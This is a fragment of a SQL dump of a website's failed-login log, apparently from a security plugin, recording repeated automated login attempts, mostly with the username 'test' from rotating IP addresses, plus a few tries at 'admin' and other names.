(103423, 1499662703.603610, 1, 'loginFailValidUsername', 'pablo', 3, 3149755246, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103424, 1499662703.603651, 1, 'loginFailValidUsername', 'julie', 2, 3149755246, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(103425, 1499668161.410145, 1, 'loginFailInvalidUsername', 'test', 0, 1039610075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103426, 1499668163.170464, 1, 'loginFailInvalidUsername', 'test', 0, 1039610075, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103427, 1499670007.681688, 1, 'loginFailInvalidUsername', 'test', 0, 36889934, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103428, 1499670914.661032, 1, 'loginFailInvalidUsername', 'test', 0, 3419742137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103429, 1499670916.913717, 1, 'loginFailInvalidUsername', 'test', 0, 3419742137, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103430, 1499671004.256151, 1, 'loginFailInvalidUsername', 'test', 0, 1394505225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103431, 1499671005.342660, 1, 'loginFailInvalidUsername', 'test', 0, 1394505225, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103432, 1499671639.135251, 1, 'loginFailInvalidUsername', 'test', 0, 763312130, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103433, 1499671640.398742, 1, 'loginFailInvalidUsername', 'test', 0, 763312130, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103434, 1499676169.368366, 1, 'loginFailInvalidUsername', 'test', 0, 1892183541, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103435, 1499676170.983915, 1, 'loginFailInvalidUsername', 'test', 0, 1892183541, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103436, 1499676833.444815, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 5.0) AppleWebKit/533.07.50 (KHTML, like Gecko) Version/4.6.1 Safari/532.14'),
(103437, 1499678271.116528, 1, 'loginFailInvalidUsername', 'test', 0, 1833786223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103438, 1499678272.132377, 1, 'loginFailInvalidUsername', 'test', 0, 1833786223, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103439, 1499680319.956256, 1, 'loginFailInvalidUsername', 'test', 0, 1948279417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103440, 1499680321.547555, 1, 'loginFailInvalidUsername', 'test', 0, 1948279417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103441, 1499681576.175741, 1, 'loginFailInvalidUsername', 'test', 0, 1560273001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103442, 1499681577.233901, 1, 'loginFailInvalidUsername', 'test', 0, 1560273001, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103443, 1499691454.620150, 1, 'loginFailInvalidUsername', 'test', 0, 1741824102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103444, 1499691456.087836, 1, 'loginFailInvalidUsername', 'test', 0, 1741824102, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103445, 1499691511.951166, 1, 'loginFailInvalidUsername', 'test', 0, 1342978817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103446, 1499691534.565950, 1, 'loginFailInvalidUsername', 'test', 0, 1342978817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103447, 1499692280.922292, 1, 'loginFailInvalidUsername', 'test', 0, 1333864093, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103448, 1499694191.360395, 1, 'loginFailInvalidUsername', 'test', 0, 3732283033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103449, 1499694192.939423, 1, 'loginFailInvalidUsername', 'test', 0, 3732283033, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103450, 1499694520.315997, 1, 'loginFailInvalidUsername', 'test', 0, 1571560994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103451, 1499694521.379058, 1, 'loginFailInvalidUsername', 'test', 0, 1571560994, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103452, 1499695554.401019, 1, 'loginFailInvalidUsername', 'test', 0, 1241121248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103453, 1499695555.492658, 1, 'loginFailInvalidUsername', 'test', 0, 1241121248, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103454, 1499697679.825259, 1, 'loginFailInvalidUsername', 'test', 0, 24802795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103455, 1499697681.570228, 1, 'loginFailInvalidUsername', 'test', 0, 24802795, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103456, 1499698232.969573, 1, 'loginFailInvalidUsername', 'test', 0, 657867090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103457, 1499698235.061575, 1, 'loginFailInvalidUsername', 'test', 0, 657867090, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103458, 1499698375.610262, 1, 'loginFailInvalidUsername', 'test', 0, 1781762660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103459, 1499698376.779178, 1, 'loginFailInvalidUsername', 'test', 0, 1781762660, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103460, 1499698955.863460, 1, 'loginFailInvalidUsername', 'test', 0, 3292351275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103461, 1499698957.380363, 1, 'loginFailInvalidUsername', 'test', 0, 3292351275, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103462, 1499702176.961073, 1, 'loginFailInvalidUsername', 'test', 0, 3308582543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103463, 1499702178.027511, 1, 'loginFailInvalidUsername', 'test', 0, 3308582543, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103464, 1499706073.258474, 1, 'loginFailInvalidUsername', 'test', 0, 3306897147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103465, 1499706075.005096, 1, 'loginFailInvalidUsername', 'test', 0, 3306897147, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103466, 1499706603.346500, 1, 'loginFailInvalidUsername', 'test', 0, 1887854844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103467, 1499706605.011273, 1, 'loginFailInvalidUsername', 'test', 0, 1887854844, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103468, 1499708317.066627, 1, 'loginFailInvalidUsername', 'test', 0, 701311595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103469, 1499708328.898353, 1, 'loginFailInvalidUsername', 'test', 0, 701311595, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103470, 1499710670.493407, 1, 'loginFailInvalidUsername', 'test', 0, 1395976121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103471, 1499710671.649184, 1, 'loginFailInvalidUsername', 'test', 0, 1395976121, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103472, 1499711953.478312, 1, 'loginFailInvalidUsername', 'test', 0, 1459283098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103473, 1499711954.676608, 1, 'loginFailInvalidUsername', 'test', 0, 1459283098, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103474, 1499713585.382100, 1, 'loginFailInvalidUsername', 'test', 0, 3000831087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103475, 1499713586.773989, 1, 'loginFailInvalidUsername', 'test', 0, 3000831087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103476, 1499724466.821968, 1, 'loginFailValidUsername', 'admin', 1, 3526612805, 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8'),
(103477, 1499725160.810143, 1, 'loginFailInvalidUsername', 'test', 0, 1768453524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103478, 1499725161.854994, 1, 'loginFailInvalidUsername', 'test', 0, 1768453524, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103479, 1499726576.599712, 1, 'loginFailInvalidUsername', 'test', 0, 2946418971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103480, 1499726578.227960, 1, 'loginFailInvalidUsername', 'test', 0, 2946418971, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103481, 1499726933.305699, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1539836950, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/535.14.61 (KHTML, like Gecko) Chrome/53.6.0234.5962 Safari/534.53'),
(103482, 1499727224.364716, 1, 'loginFailInvalidUsername', 'test', 0, 1892355369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103483, 1499727225.854103, 1, 'loginFailInvalidUsername', 'test', 0, 1892355369, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103484, 1499727561.963050, 1, 'loginFailInvalidUsername', 'test', 0, 3138536518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103485, 1499727563.348980, 1, 'loginFailInvalidUsername', 'test', 0, 3138536518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103486, 1499727757.013330, 1, 'loginFailInvalidUsername', 'test', 0, 1812380312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103487, 1499727758.161812, 1, 'loginFailInvalidUsername', 'test', 0, 1812380312, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103488, 1499734210.924378, 1, 'loginFailInvalidUsername', 'test', 0, 1410847463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103489, 1499734623.999097, 1, 'loginFailInvalidUsername', 'test', 0, 1028806899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103490, 1499734625.636244, 1, 'loginFailInvalidUsername', 'test', 0, 1028806899, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103491, 1499738745.957166, 1, 'loginFailInvalidUsername', 'test', 0, 1645581817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103492, 1499738747.303511, 1, 'loginFailInvalidUsername', 'test', 0, 1645581817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103493, 1499740244.502713, 1, 'loginFailInvalidUsername', 'test', 0, 245877264, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103494, 1499740245.983547, 1, 'loginFailInvalidUsername', 'test', 0, 245877264, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103495, 1499741324.154271, 1, 'loginFailInvalidUsername', 'test', 0, 1590451502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103496, 1499741325.347654, 1, 'loginFailInvalidUsername', 'test', 0, 1590451502, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103497, 1499745448.684949, 1, 'loginFailInvalidUsername', 'test', 0, 1578443392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103498, 1499745449.649471, 1, 'loginFailInvalidUsername', 'test', 0, 1578443392, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103499, 1499745558.595694, 1, 'loginFailInvalidUsername', 'test', 0, 3705789221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103500, 1499745560.047774, 1, 'loginFailInvalidUsername', 'test', 0, 3705789221, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103501, 1499746334.473490, 1, 'loginFailInvalidUsername', 'test', 0, 1321684459, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103502, 1499747779.964210, 1, 'loginFailInvalidUsername', 'test', 0, 1227113202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103503, 1499747781.326216, 1, 'loginFailInvalidUsername', 'test', 0, 1227113202, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103504, 1499752168.694454, 1, 'loginFailInvalidUsername', 'test', 0, 3680243721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103505, 1499752170.323631, 1, 'loginFailInvalidUsername', 'test', 0, 3680243721, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103506, 1499759985.073533, 1, 'loginFailInvalidUsername', 'test', 0, 694534886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103507, 1499759986.225429, 1, 'loginFailInvalidUsername', 'test', 0, 694534886, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103508, 1499763030.026090, 1, 'loginFailInvalidUsername', 'test', 0, 1497371688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103509, 1499763031.024803, 1, 'loginFailInvalidUsername', 'test', 0, 1497371688, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103510, 1499763072.703885, 1, 'loginFailInvalidUsername', 'test', 0, 2981638491, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103511, 1499763074.228550, 1, 'loginFailInvalidUsername', 'test', 0, 2981638491, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103512, 1499763513.991719, 1, 'loginFailInvalidUsername', 'test', 0, 2967382402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103513, 1499763515.110287, 1, 'loginFailInvalidUsername', 'test', 0, 2967382402, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103514, 1499764076.903855, 1, 'loginFailInvalidUsername', 'test', 0, 1477195351, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103515, 1499764077.921870, 1, 'loginFailInvalidUsername', 'test', 0, 1477195351, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103516, 1499764182.424323, 1, 'loginFailInvalidUsername', 'test', 0, 2187978002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103517, 1499764184.287492, 1, 'loginFailInvalidUsername', 'test', 0, 2187978002, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103518, 1499769318.125945, 1, 'loginFailInvalidUsername', 'test', 0, 1731873530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103519, 1499769319.610046, 1, 'loginFailInvalidUsername', 'test', 0, 1731873530, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103520, 1499770580.253707, 1, 'loginFailInvalidUsername', 'test', 0, 3157456204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103521, 1499770581.370325, 1, 'loginFailInvalidUsername', 'test', 0, 3157456204, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103522, 1499772103.335115, 1, 'loginFailInvalidUsername', 'test', 0, 708674819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103523, 1499772104.974701, 1, 'loginFailInvalidUsername', 'test', 0, 708674819, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103524, 1499773102.006517, 1, 'loginFailInvalidUsername', 'test', 0, 37529501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103525, 1499773103.405524, 1, 'loginFailInvalidUsername', 'test', 0, 37529501, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103526, 1499774370.664324, 1, 'loginFailInvalidUsername', 'test', 0, 1756358087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103527, 1499774371.948776, 1, 'loginFailInvalidUsername', 'test', 0, 1756358087, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103528, 1499774492.973361, 1, 'loginFailValidUsername', 'admin', 1, 1539836950, 'Mozilla/5.0 (Windows NT 6.0; rv:45.64.01) Gecko/20152037 Firefox/45.64.01'),
(103529, 1499774762.437579, 1, 'loginFailInvalidUsername', 'test', 0, 533313106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103530, 1499774763.531315, 1, 'loginFailInvalidUsername', 'test', 0, 533313106, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103531, 1499776538.087857, 1, 'loginFailInvalidUsername', 'test', 0, 87497983, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103532, 1499776539.193767, 1, 'loginFailInvalidUsername', 'test', 0, 87497983, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103533, 1499776667.645163, 1, 'loginFailInvalidUsername', 'test', 0, 3010035227, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103534, 1499776669.079775, 1, 'loginFailInvalidUsername', 'test', 0, 3010035227, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103535, 1499777587.072508, 1, 'loginFailInvalidUsername', 'test', 0, 698435692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103536, 1499777588.446994, 1, 'loginFailInvalidUsername', 'test', 0, 698435692, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103537, 1499778964.519149, 1, 'loginFailInvalidUsername', 'test', 0, 1502264417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103538, 1499778965.579193, 1, 'loginFailInvalidUsername', 'test', 0, 1502264417, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103539, 1499779975.151724, 1, 'loginFailInvalidUsername', 'test', 0, 19448670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103540, 1499779976.684274, 1, 'loginFailInvalidUsername', 'test', 0, 19448670, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103541, 1499786579.661157, 1, 'loginFailInvalidUsername', 'test', 0, 1209773993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103542, 1499786580.893996, 1, 'loginFailInvalidUsername', 'test', 0, 1209773993, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103543, 1499786732.525105, 1, 'loginFailInvalidUsername', 'test', 0, 1473798636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103544, 1499786734.728745, 1, 'loginFailInvalidUsername', 'test', 0, 1473798636, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103545, 1499788092.779211, 1, 'loginFailInvalidUsername', 'test', 0, 1326068261, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103546, 1499789778.334472, 1, 'loginFailInvalidUsername', 'test', 0, 1488164905, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103547, 1499789779.280140, 1, 'loginFailInvalidUsername', 'test', 0, 1488164905, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103548, 1499790969.800026, 1, 'loginFailInvalidUsername', 'test', 0, 3006594428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103549, 1499790971.393849, 1, 'loginFailInvalidUsername', 'test', 0, 3006594428, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103550, 1499793423.273317, 1, 'loginFailInvalidUsername', 'test', 0, 1548501513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103551, 1499793424.347978, 1, 'loginFailInvalidUsername', 'test', 0, 1548501513, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103552, 1499793898.154799, 1, 'loginFailInvalidUsername', 'test', 0, 1730749605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103553, 1499793904.178839, 1, 'loginFailInvalidUsername', 'test', 0, 1730749605, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103554, 1499802638.466494, 1, 'loginFailInvalidUsername', 'test', 0, 3413133493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103555, 1499802640.033724, 1, 'loginFailInvalidUsername', 'test', 0, 3413133493, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103556, 1499803250.089469, 1, 'loginFailInvalidUsername', 'test', 0, 3140913718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103557, 1499803251.557501, 1, 'loginFailInvalidUsername', 'test', 0, 3140913718, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103558, 1499804457.501709, 1, 'loginFailInvalidUsername', 'test', 0, 3247852545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103559, 1499804458.570194, 1, 'loginFailInvalidUsername', 'test', 0, 3247852545, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103560, 1499807341.152149, 1, 'loginFailInvalidUsername', 'test', 0, 3245049544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103561, 1499807342.261316, 1, 'loginFailInvalidUsername', 'test', 0, 3245049544, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103562, 1499809304.852513, 1, 'loginFailInvalidUsername', 'test', 0, 1371582420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103563, 1499809305.991418, 1, 'loginFailInvalidUsername', 'test', 0, 1371582420, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103564, 1499809617.929396, 1, 'loginFailInvalidUsername', 'test', 0, 792007333, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103565, 1499812126.106752, 1, 'loginFailInvalidUsername', 'test', 0, 1240951517, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103566, 1499812127.399815, 1, 'loginFailInvalidUsername', 'test', 0, 1240951517, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103567, 1499814724.729252, 1, 'loginFailInvalidUsername', 'test', 0, 1981451970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103568, 1499814726.086212, 1, 'loginFailInvalidUsername', 'test', 0, 1981451970, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103569, 1499816748.979111, 1, 'loginFailInvalidUsername', 'test', 0, 1302628173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103570, 1499816749.961033, 1, 'loginFailInvalidUsername', 'test', 0, 1302628173, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103571, 1499817956.148193, 1, 'loginFailInvalidUsername', 'test', 0, 1308501163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103572, 1499817957.223831, 1, 'loginFailInvalidUsername', 'test', 0, 1308501163, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103573, 1499818437.418139, 1, 'loginFailInvalidUsername', 'test', 0, 3321488109, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(103574, 1499818504.684116, 1, 'loginFailInvalidUsername', 'test', 0, 1849084337, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
